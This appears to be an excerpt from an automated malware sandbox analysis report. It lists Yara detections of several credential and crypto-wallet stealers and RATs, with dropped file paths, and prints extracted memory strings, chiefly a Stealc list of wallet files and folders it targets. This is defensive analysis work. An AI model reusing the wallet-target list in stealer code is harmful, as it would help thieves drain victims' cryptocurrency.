Source: Yara match	File source: 00000003.00000003.1408682891.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1434414768.0000000000211000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2078736142.0000000000611000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2079003288.0000000000221000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3813401574.0000000000221000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2097350358.0000000000221000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2069470188.0000000000611000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1364464684.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1404879841.0000000000871000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.2076774547.0000000000221000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1976285464.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe, type: DROPPED

Yara detected Clipboard Hijacker

Source: Yara match	File source: 0000001C.00000003.3201366776.0000000003E85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JavvvUmar.exe PID: 7192, type: MEMORYSTR

Yara detected CryptOne packer

Source: Yara match

File source: 00000017.00000002.2248416427.0000000003159000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: JavvvUmar.exe PID: 7192, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2188308850.0000000000F42000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 10.2.gold.exe.41f5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.crypted.exe.3b75570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.gold.exe.41f5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.u3uP67496d.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.2055908255.00000000009B2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2581111095.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2010973024.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2186619176.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gold.exe PID: 1072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: u3uP67496d.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: penis.exe PID: 4764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 5452, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\u3uP67496d.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 23.2.needmoney.exe.312a4b9.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.stealc_default2.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.stealc_default2.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.312a4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2318326891.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2261123132.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2323134391.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2088515827.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR

Yara detected Zhark RAT

Source: Yara match	File source: 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6412, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
